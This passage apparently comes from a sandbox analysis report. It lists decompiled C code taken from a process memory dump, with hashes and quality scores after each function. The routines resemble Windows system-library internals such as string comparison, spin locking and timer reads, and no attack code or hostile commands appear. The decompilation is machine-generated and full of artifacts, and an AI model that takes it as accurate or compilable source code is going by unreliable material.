                        							_t97 =  *0x2be6d5c; // 0x7fa20654
                        							_t72 =  *0x2be6d5c; // 0x7fa20654
                        							_t75 =  *0x2be6d5c; // 0x7fa20654
                        							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                        						} else {
                        							_t116 = _t116 - 0x20;
                        						}
                        					}
                        					if(_t128 >= 0x61) {
                        						if(_t128 > 0x7a) {
                        							_t102 =  *0x2be6d5c; // 0x7fa20654
                        							_t84 =  *0x2be6d5c; // 0x7fa20654
                        							_t87 =  *0x2be6d5c; // 0x7fa20654
                        							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                        						} else {
                        							_t128 = _t128 - 0x20;
                        						}
                        					}
                        					if(_t116 == _t128) {
                        						_t61 = _v12;
                        						_t96 = _v8;
                        					} else {
                        						_t113 = _t116 - _t128;
                        						L9:
                        						_t111 = _a4;
                        						if(_t113 == 0) {
                        							_t115 =  &(( *_t119)[_t111 + 1]);
                        							_t33 =  &(_t119[1]); // 0x100
                        							_t120 = _a8;
                        							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                        							_t35 = _t95 - 1; // 0xff
                        							_t124 = _t35;
                        							if(_t120 == 0) {
                        								L27:
                        								 *_a16 = _t95;
                        								_t56 = 0xc0000023;
                        								goto L16;
                        							}
                        							if(_t124 >= _a12) {
                        								if(_a12 >= 1) {
                        									 *_t120 = 0;
                        								}
                        								goto L27;
                        							}
                        							 *_a16 = _t124;
                        							_t125 = _t124 + _t124;
                        							E02B3F3E0(_t120, _t115, _t125);
                        							_t56 = 0;
                        							 *((short*)(_t125 + _t120)) = 0;
                        							goto L16;
                        						}
                        						_t119 =  &(_t119[2]);
                        						if(_t119 < _v24) {
                        							L2:
                        							_t91 =  *_t119;
                        							_t61 = _t91;
                        							_v12 = _t61;
                        							_t112 =  &(_t61[_t111]);
                        							_v8 = _t112;
                        							if(_t61 >= _t112) {
                        								break;
                        							} else {
                        								_t127 = _v16 - _t91;
                        								_t96 = _t112;
                        								_v20 = _t127;
                        								_t116 =  *_t61 & 0x0000ffff;
                        								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                        								if(_t116 == _t128) {
                        									goto L18;
                        								}
                        								goto L5;
                        							}
                        						} else {
                        							_t90 = _v28;
                        							_t57 = _v32;
                        							_t123 = _v36;
                        							goto L12;
                        						}
                        					}
                        					L18:
                        					_t61 =  &(_t61[1]);
                        					_v12 = _t61;
                        					if(_t61 >= _t96) {
                        						break;
                        					}
                        					_t127 = _v20;
                        				}
                        				_t113 = 0;
                        				goto L9;
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c81cbaec442d6e487ff03c3bcfea2f36b48fc0250f7f750eb75dabfeae1203fa
                        • Instruction ID: 848d0c3c5d8115312417226de907b28f6f29ad966ca208cbf2080d4e5d558c32
                        • Opcode Fuzzy Hash: c81cbaec442d6e487ff03c3bcfea2f36b48fc0250f7f750eb75dabfeae1203fa
                        • Instruction Fuzzy Hash: 6C51C276E00225CFCB18DF2DC8849BDB7B1FB88700716859AEC4ADB364D734AA55CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E02BBAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
                        				signed int _v8;
                        				signed int _v12;
                        				void* __esi;
                        				void* __ebp;
                        				signed short* _t36;
                        				signed int _t41;
                        				char* _t42;
                        				intOrPtr _t43;
                        				signed int _t47;
                        				void* _t52;
                        				signed int _t57;
                        				intOrPtr _t61;
                        				signed char _t62;
                        				signed int _t72;
                        				signed char _t85;
                        				signed int _t88;
                        
                        				_t73 = __edx;
                        				_push(__ecx);
                        				_t85 = __ecx;
                        				_v8 = __edx;
                        				_t61 =  *((intOrPtr*)(__ecx + 0x28));
                        				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
                        				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                        					_t57 = _t57 | 0x00000001;
                        				}
                        				_t88 = 0;
                        				_t36 = 0;
                        				_t96 = _a12;
                        				if(_a12 == 0) {
                        					_t62 = _a8;
                        					__eflags = _t62;
                        					if(__eflags == 0) {
                        						goto L12;
                        					}
                        					_t52 = E02BBC38B(_t85, _t73, _t57, 0);
                        					_t62 = _a8;
                        					 *_t62 = _t52;
                        					_t36 = 0;
                        					goto L11;
                        				} else {
                        					_t36 = E02BBACFD(_t85, _t73, _t96, _t57, _a8);
                        					if(0 == 0 || 0 == 0xffffffff) {
                        						_t72 = _t88;
                        					} else {
                        						_t72 =  *0x00000000 & 0x0000ffff;
                        					}
                        					 *_a12 = _t72;
                        					_t62 = _a8;
                        					L11:
                        					_t73 = _v8;
                        					L12:
                        					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
                        						L19:
                        						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
                        							L22:
                        							_t74 = _v8;
                        							__eflags = _v8;
                        							if(__eflags != 0) {
                        								L25:
                        								__eflags = _t88 - 2;
                        								if(_t88 != 2) {
                        									__eflags = _t85 + 0x44 + (_t88 << 6);
                        									_t88 = E02BBFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
                        									goto L34;
                        								}
                        								L26:
                        								_t59 = _v8;
                        								E02BBEA55(_t85, _v8, _t57);
                        								asm("sbb esi, esi");
                        								_t88 =  ~_t88;
                        								_t41 = E02B17D50();
                        								__eflags = _t41;
                        								if(_t41 == 0) {
                        									_t42 = 0x7ffe0380;
                        								} else {
                        									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        								}
                        								__eflags =  *_t42;
                        								if( *_t42 != 0) {
                        									_t43 =  *[fs:0x30];
                        									__eflags =  *(_t43 + 0x240) & 0x00000001;
                        									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
                        										__eflags = _t88;
                        										if(_t88 != 0) {
                        											E02BB1608(_t85, _t59, 3);
                        										}
                        									}
                        								}
                        								goto L34;
                        							}
                        							_push(_t62);
                        							_t47 = E02BC1536(0x2be8ae4, (_t74 -  *0x2be8b04 >> 0x14) + (_t74 -  *0x2be8b04 >> 0x14), _t88, __eflags);
                        							__eflags = _t47;
                        							if(_t47 == 0) {
                        								goto L26;
                        							}
                        							_t74 = _v12;
                        							_t27 = _t47 - 1; // -1
                        							_t88 = _t27;
                        							goto L25;
                        						}
                        						_t62 = _t85;
                        						if(L02BBC323(_t62, _v8, _t57) != 0xffffffff) {
                        							goto L22;
                        						}
                        						_push(_t62);
                        						_push(_t88);
                        						E02BBA80D(_t85, 9, _v8, _t88);
                        						goto L34;
                        					} else {
                        						_t101 = _t36;
                        						if(_t36 != 0) {
                        							L16:
                        							if(_t36 == 0xffffffff) {
                        								goto L19;
                        							}
                        							_t62 =  *((intOrPtr*)(_t36 + 2));
                        							if((_t62 & 0x0000000f) == 0) {
                        								goto L19;
                        							}
                        							_t62 = _t62 & 0xf;
                        							if(E02B9CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
                        								L34:
                        								return _t88;
                        							}
                        							goto L19;
                        						}
                        						_t62 = _t85;
                        						_t36 = E02BBACFD(_t62, _t73, _t101, _t57, _t62);
                        						if(_t36 == 0) {
                        							goto L19;
                        						}
                        						goto L16;
                        					}
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2311aed1c1e8b980a0f89ad0931bd3f5398c7a5ad64986a51f7e3a319d6caf96
                        • Instruction ID: 182a08fbb11bf2d01191b6d8c1be32aad71455f02e02b8ade04dd3580c77d01f
                        • Opcode Fuzzy Hash: 2311aed1c1e8b980a0f89ad0931bd3f5398c7a5ad64986a51f7e3a319d6caf96
                        • Instruction Fuzzy Hash: 26410A72F006519FCB27DA29C898BFBB79AEF84714F144299F856C7290DBB4D801CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E02B1DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                        				char _v5;
                        				signed int _v12;
                        				signed int* _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				intOrPtr _v40;
                        				intOrPtr _v44;
                        				void* __ebx;
                        				void* __edi;
                        				signed int _t54;
                        				char* _t58;
                        				signed int _t66;
                        				intOrPtr _t67;
                        				intOrPtr _t68;
                        				intOrPtr _t72;
                        				intOrPtr _t73;
                        				signed int* _t75;
                        				intOrPtr _t79;
                        				intOrPtr _t80;
                        				char _t82;
                        				signed int _t83;
                        				signed int _t84;
                        				signed int _t88;
                        				signed int _t89;
                        				intOrPtr _t90;
                        				intOrPtr _t92;
                        				signed int _t97;
                        				intOrPtr _t98;
                        				intOrPtr* _t99;
                        				signed int* _t101;
                        				signed int* _t102;
                        				intOrPtr* _t103;
                        				intOrPtr _t105;
                        				signed int _t106;
                        				void* _t118;
                        
                        				_t92 = __edx;
                        				_t75 = _a4;
                        				_t98 = __ecx;
                        				_v44 = __edx;
                        				_t106 = _t75[1];
                        				_v40 = __ecx;
                        				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                        					_t82 = 0;
                        				} else {
                        					_t82 = 1;
                        				}
                        				_v5 = _t82;
                        				_t6 = _t98 + 0xc8; // 0xc9
                        				_t101 = _t6;
                        				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                        				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                        				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                        				if(_t82 != 0) {
                        					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                        					_t83 =  *_t75;
                        					_t54 = _t75[1];
                        					 *_t101 = _t83;
                        					_t84 = _t83 | _t54;
                        					_t101[1] = _t54;
                        					if(_t84 == 0) {
                        						_t101[1] = _t101[1] & _t84;
                        						 *_t101 = 1;
                        					}
                        					goto L19;
                        				} else {
                        					if(_t101 == 0) {
                        						E02AFCC50(E02AF4510(0xc000000d));
                        						_t88 =  *_t101;
                        						_t97 = _t101[1];
                        						L15:
                        						_v12 = _t88;
                        						_t66 = _t88 -  *_t75;
                        						_t89 = _t97;
                        						asm("sbb ecx, [ebx+0x4]");
                        						_t118 = _t89 - _t97;
                        						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                        							_t66 = _t66 | 0xffffffff;
                        							_t89 = 0x7fffffff;
                        						}
                        						 *_t101 = _t66;
                        						_t101[1] = _t89;
                        						L19:
                        						if(E02B17D50() != 0) {
                        							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        						} else {
                        							_t58 = 0x7ffe0386;
                        						}
                        						_t102 = _v16;
                        						if( *_t58 != 0) {
                        							_t58 = E02BC8ED6(_t102, _t98);
                        						}
                        						_t76 = _v44;
                        						E02B12280(_t58, _v44);
                        						E02B1DD82(_v44, _t102, _t98);
                        						E02B1B944(_t102, _v5);
                        						return E02B0FFB0(_t76, _t98, _t76);
                        					}
                        					_t99 = 0x7ffe03b0;
                        					do {
                        						_t103 = 0x7ffe0010;
                        						do {
                        							_t67 =  *0x2be8628; // 0x0
                        							_v28 = _t67;
                        							_t68 =  *0x2be862c; // 0x0
                        							_v32 = _t68;
                        							_v24 =  *((intOrPtr*)(_t99 + 4));
                        							_v20 =  *_t99;
                        							while(1) {
                        								_t97 =  *0x7ffe000c;
                        								_t90 =  *0x7FFE0008;
                        								if(_t97 ==  *_t103) {
                        									goto L10;
                        								}
                        								asm("pause");
                        							}
                        							L10:
                        							_t79 = _v24;
                        							_t99 = 0x7ffe03b0;
                        							_v12 =  *0x7ffe03b0;
                        							_t72 =  *0x7FFE03B4;
                        							_t103 = 0x7ffe0010;
                        							_v36 = _t72;
                        						} while (_v20 != _v12 || _t79 != _t72);
                        						_t73 =  *0x2be8628; // 0x0
                        						_t105 = _v28;
                        						_t80 =  *0x2be862c; // 0x0
                        					} while (_t105 != _t73 || _v32 != _t80);
                        					_t98 = _v40;
                        					asm("sbb edx, [ebp-0x20]");
                        					_t88 = _t90 - _v12 - _t105;
                        					_t75 = _a4;
                        					asm("sbb edx, eax");
                        					_t31 = _t98 + 0xc8; // 0x2bbfb53
                        					_t101 = _t31;
                        					 *_t101 = _t88;
                        					_t101[1] = _t97;
                        					goto L15;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8fe9abbc4c5300ff0d8100e4bf4484728ab3188fe8afc57e8e20430b6d044862
                        • Instruction ID: ebabde2c6ccfcce4c8ded2040435983c2279b3cd1a262473464adae4fd57a2b5
                        • Opcode Fuzzy Hash: 8fe9abbc4c5300ff0d8100e4bf4484728ab3188fe8afc57e8e20430b6d044862
                        • Instruction Fuzzy Hash: E5519FB1A01616DFCB14DFA8C480BAEFBF2FB49350F20859AD555AB340DB35A944CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 96%
                        			E02B0EF40(intOrPtr __ecx) {
                        				char _v5;
                        				char _v6;
                        				char _v7;
                        				char _v8;
                        				signed int _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr _t58;
                        				char _t59;
                        				signed char _t69;
                        				void* _t73;
                        				signed int _t74;
                        				char _t79;
                        				signed char _t81;
                        				signed int _t85;
                        				signed int _t87;
                        				intOrPtr _t90;
                        				signed char* _t91;
                        				void* _t92;
                        				signed int _t94;
                        				void* _t96;
                        
                        				_t90 = __ecx;
                        				_v16 = __ecx;
                        				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                        					_t58 =  *((intOrPtr*)(__ecx));
                        					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                        						E02AF9080(_t73, __ecx, __ecx, _t92);
                        					}
                        				}
                        				_t74 = 0;
                        				_t96 =  *0x7ffe036a - 1;
                        				_v12 = 0;
                        				_v7 = 0;
                        				if(_t96 > 0) {
                        					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                        					_v12 = _t74;
                        					_v7 = _t96 != 0;
                        				}
                        				_t79 = 0;
                        				_v8 = 0;
                        				_v5 = 0;
                        				while(1) {
                        					L4:
                        					_t59 = 1;
                        					L5:
                        					while(1) {
                        						if(_t59 == 0) {
                        							L12:
                        							_t21 = _t90 + 4; // 0x77dfc21e
                        							_t87 =  *_t21;
                        							_v6 = 0;
                        							if(_t79 != 0) {
                        								if((_t87 & 0x00000002) != 0) {
                        									goto L19;
                        								}
                        								if((_t87 & 0x00000001) != 0) {
                        									_v6 = 1;
                        									_t74 = _t87 ^ 0x00000003;
                        								} else {
                        									_t51 = _t87 - 2; // -2
                        									_t74 = _t51;
                        								}
                        								goto L15;
                        							} else {
                        								if((_t87 & 0x00000001) != 0) {
                        									_v6 = 1;
                        									_t74 = _t87 ^ 0x00000001;
                        								} else {
                        									_t26 = _t87 - 4; // -4
                        									_t74 = _t26;
                        									if((_t74 & 0x00000002) == 0) {
                        										_t74 = _t74 - 2;
                        									}
                        								}
                        								L15:
                        								if(_t74 == _t87) {
                        									L19:
                        									E02AF2D8A(_t74, _t90, _t87, _t90);
                        									_t74 = _v12;
                        									_v8 = 1;
                        									if(_v7 != 0 && _t74 > 0x64) {
                        										_t74 = _t74 - 1;
                        										_v12 = _t74;
                        									}
                        									_t79 = _v5;
                        									goto L4;
                        								}
                        								asm("lock cmpxchg [esi], ecx");
                        								if(_t87 != _t87) {
                        									_t74 = _v12;
                        									_t59 = 0;
                        									_t79 = _v5;
                        									continue;
                        								}
                        								if(_v6 != 0) {
                        									_t74 = _v12;
                        									L25:
                        									if(_v7 != 0) {
                        										if(_t74 < 0x7d0) {
                        											if(_v8 == 0) {
                        												_t74 = _t74 + 1;
                        											}
                        										}
                        										_t38 = _t90 + 0x14; // 0x0
                        										_t39 = _t90 + 0x14; // 0x0
                        										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                        										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                        											_t85 = _t85 & 0xff000000;
                        										}
                        										 *(_t90 + 0x14) = _t85;
                        									}
                        									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                        									 *((intOrPtr*)(_t90 + 8)) = 1;
                        									return 0;
                        								}
                        								_v5 = 1;
                        								_t87 = _t74;
                        								goto L19;
                        							}
                        						}
                        						_t94 = _t74;
                        						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                        						if(_t74 == 0) {
                        							goto L12;
                        						} else {
                        							_t91 = _t90 + 4;
                        							goto L8;
                        							L9:
                        							while((_t81 & 0x00000001) != 0) {
                        								_t69 = _t81;
                        								asm("lock cmpxchg [edi], edx");
                        								if(_t69 != _t81) {
                        									_t81 = _t69;
                        									continue;
                        								}
                        								_t90 = _v16;
                        								goto L25;
                        							}
                        							asm("pause");
                        							_t94 = _t94 - 1;
                        							if(_t94 != 0) {
                        								L8:
                        								_t81 =  *_t91;
                        								goto L9;
                        							} else {
                        								_t90 = _v16;
                        								_t79 = _v5;
                        								goto L12;
                        							}
                        						}
                        					}
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                        • Instruction ID: 49845d319deabf17d3d6c2f6a1e2bc841d9ef15da122f984eeb29db35908a636
                        • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                        • Instruction Fuzzy Hash: 0C51F030E042499FEB26CF68C1D0BAEBFB1EF15318F1881E8D855976C1DB75A989C741
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 84%
                        			E02BC740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                        				signed short* _v8;
                        				intOrPtr _v12;
                        				intOrPtr _t55;
                        				void* _t56;
                        				intOrPtr* _t66;
                        				intOrPtr* _t69;
                        				void* _t74;
                        				intOrPtr* _t78;
                        				intOrPtr* _t81;
                        				intOrPtr* _t82;
                        				intOrPtr _t83;
                        				signed short* _t84;
                        				intOrPtr _t85;
                        				signed int _t87;
                        				intOrPtr* _t90;
                        				intOrPtr* _t93;
                        				intOrPtr* _t94;
                        				void* _t98;
                        
                        				_t84 = __edx;
                        				_t80 = __ecx;
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t55 = __ecx;
                        				_v8 = __edx;
                        				_t87 =  *__edx & 0x0000ffff;
                        				_v12 = __ecx;
                        				_t3 = _t55 + 0x154; // 0x154
                        				_t93 = _t3;
                        				_t78 =  *_t93;
                        				_t4 = _t87 + 2; // 0x2
                        				_t56 = _t4;
                        				while(_t78 != _t93) {
                        					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                        						L4:
                        						_t78 =  *_t78;
                        						continue;
                        					} else {
                        						_t7 = _t78 + 0x18; // 0x18
                        						if(E02B4D4F0(_t7, _t84[2], _t87) == _t87) {
                        							_t40 = _t78 + 0xc; // 0xc
                        							_t94 = _t40;
                        							_t90 =  *_t94;
                        							while(_t90 != _t94) {
                        								_t41 = _t90 + 8; // 0x8
                        								_t74 = E02B3F380(_a4, _t41, 0x10);
                        								_t98 = _t98 + 0xc;
                        								if(_t74 != 0) {
                        									_t90 =  *_t90;
                        									continue;
                        								}
                        								goto L12;
                        							}
                        							_t82 = L02B14620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                        							if(_t82 != 0) {
                        								_t46 = _t78 + 0xc; // 0xc
                        								_t69 = _t46;
                        								asm("movsd");
                        								asm("movsd");
                        								asm("movsd");
                        								asm("movsd");
                        								_t85 =  *_t69;
                        								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                        									L20:
                        									_t82 = 3;
                        									asm("int 0x29");
                        								}
                        								 *((intOrPtr*)(_t82 + 4)) = _t69;
                        								 *_t82 = _t85;
                        								 *((intOrPtr*)(_t85 + 4)) = _t82;
                        								 *_t69 = _t82;
                        								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                        								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                        								goto L11;
                        							} else {
                        								L18:
                        								_push(0xe);
                        								_pop(0);
                        							}
                        						} else {
                        							_t84 = _v8;
                        							_t9 = _t87 + 2; // 0x2
                        							_t56 = _t9;
                        							goto L4;
                        						}
                        					}
                        					L12:
                        					return 0;
                        				}
                        				_t10 = _t87 + 0x1a; // 0x1a
                        				_t78 = L02B14620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                        				if(_t78 == 0) {
                        					goto L18;
                        				} else {
                        					_t12 = _t87 + 2; // 0x2
                        					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                        					_t16 = _t78 + 0x18; // 0x18
                        					E02B3F3E0(_t16, _v8[2], _t87);
                        					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                        					_t19 = _t78 + 0xc; // 0xc
                        					_t66 = _t19;
                        					 *((intOrPtr*)(_t66 + 4)) = _t66;
                        					 *_t66 = _t66;
                        					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                        					_t81 = L02B14620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                        					if(_t81 == 0) {
                        						goto L18;
                        					} else {
                        						_t26 = _t78 + 0xc; // 0xc
                        						_t69 = _t26;
                        						asm("movsd");
                        						asm("movsd");
                        						asm("movsd");
                        						asm("movsd");
                        						_t85 =  *_t69;
                        						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                        							goto L20;
                        						} else {
                        							 *((intOrPtr*)(_t81 + 4)) = _t69;
                        							 *_t81 = _t85;
                        							 *((intOrPtr*)(_t85 + 4)) = _t81;
                        							 *_t69 = _t81;
                        							_t83 = _v12;
                        							 *(_t78 + 8) = 1;
                        							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                        							_t34 = _t83 + 0x154; // 0x1ba
                        							_t69 = _t34;
                        							_t85 =  *_t69;
                        							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                        								goto L20;
                        							} else {
                        								 *_t78 = _t85;
                        								 *((intOrPtr*)(_t78 + 4)) = _t69;
                        								 *((intOrPtr*)(_t85 + 4)) = _t78;
                        								 *_t69 = _t78;
                        								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                        							}
                        						}
                        						goto L11;
                        					}
                        				}
                        				goto L12;
                        			}






















                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                        • Instruction ID: 0e63e5d22dc24a4ecdcf22edd357c3761717ad79b9ca77702a6f5e75935979e6
                        • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                        • Instruction Fuzzy Hash: 93515A71600606EFCB15CF14C480A96FBB9FF45304F2981EAE9089F252E771E946DF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 97%
                        			E02B22990() {
                        				signed int* _t62;
                        				signed int _t64;
                        				intOrPtr _t66;
                        				signed short* _t69;
                        				intOrPtr _t76;
                        				signed short* _t79;
                        				void* _t81;
                        				signed int _t82;
                        				signed short* _t83;
                        				signed int _t87;
                        				intOrPtr _t91;
                        				void* _t98;
                        				signed int _t99;
                        				void* _t101;
                        				signed int* _t102;
                        				void* _t103;
                        				void* _t104;
                        				void* _t107;
                        
                        				_push(0x20);
                        				_push(0x2bcff00);
                        				E02B4D08C(_t81, _t98, _t101);
                        				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                        				_t99 = 0;
                        				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                        				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                        				if(_t82 == 0) {
                        					_t62 = 0xc0000100;
                        				} else {
                        					 *((intOrPtr*)(_t103 - 4)) = 0;
                        					_t102 = 0xc0000100;
                        					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                        					_t64 = 4;
                        					while(1) {
                        						 *(_t103 - 0x24) = _t64;
                        						if(_t64 == 0) {
                        							break;
                        						}
                        						_t87 = _t64 * 0xc;
                        						 *(_t103 - 0x2c) = _t87;
                        						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x2ad1664));
                        						if(_t107 <= 0) {
                        							if(_t107 == 0) {
                        								_t79 = E02B3E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x2ad1668)), _t82);
                        								_t104 = _t104 + 0xc;
                        								__eflags = _t79;
                        								if(__eflags == 0) {
                        									_t102 = E02B751BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x2ad166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                        									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                        									break;
                        								} else {
                        									_t64 =  *(_t103 - 0x24);
                        									goto L5;
                        								}
                        								goto L13;
                        							} else {
                        								L5:
                        								_t64 = _t64 - 1;
                        								continue;
                        							}
                        						}
                        						break;
                        					}
                        					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                        					__eflags = _t102;
                        					if(_t102 < 0) {
                        						__eflags = _t102 - 0xc0000100;
                        						if(_t102 == 0xc0000100) {
                        							_t83 =  *((intOrPtr*)(_t103 + 8));
                        							__eflags = _t83;
                        							if(_t83 != 0) {
                        								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                        								__eflags =  *_t83 - _t99;
                        								if( *_t83 == _t99) {
                        									_t102 = 0xc0000100;
                        									goto L19;
                        								} else {
                        									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                        									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                        									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                        									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                        										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                        										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                        											L26:
                        											_t102 = E02B22AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                        											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                        											__eflags = _t102 - 0xc0000100;
                        											if(_t102 != 0xc0000100) {
                        												goto L12;
                        											} else {
                        												_t99 = 1;
                        												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                        												goto L18;
                        											}
                        										} else {
                        											_t69 = E02B06600( *((intOrPtr*)(_t91 + 0x1c)));
                        											__eflags = _t69;
                        											if(_t69 != 0) {
                        												goto L26;
                        											} else {
                        												_t83 =  *((intOrPtr*)(_t103 + 8));
                        												goto L18;
                        											}
                        										}
                        									} else {
                        										L18:
                        										_t102 = E02B22C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                        										L19:
                        										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                        										goto L12;
                        									}
                        								}
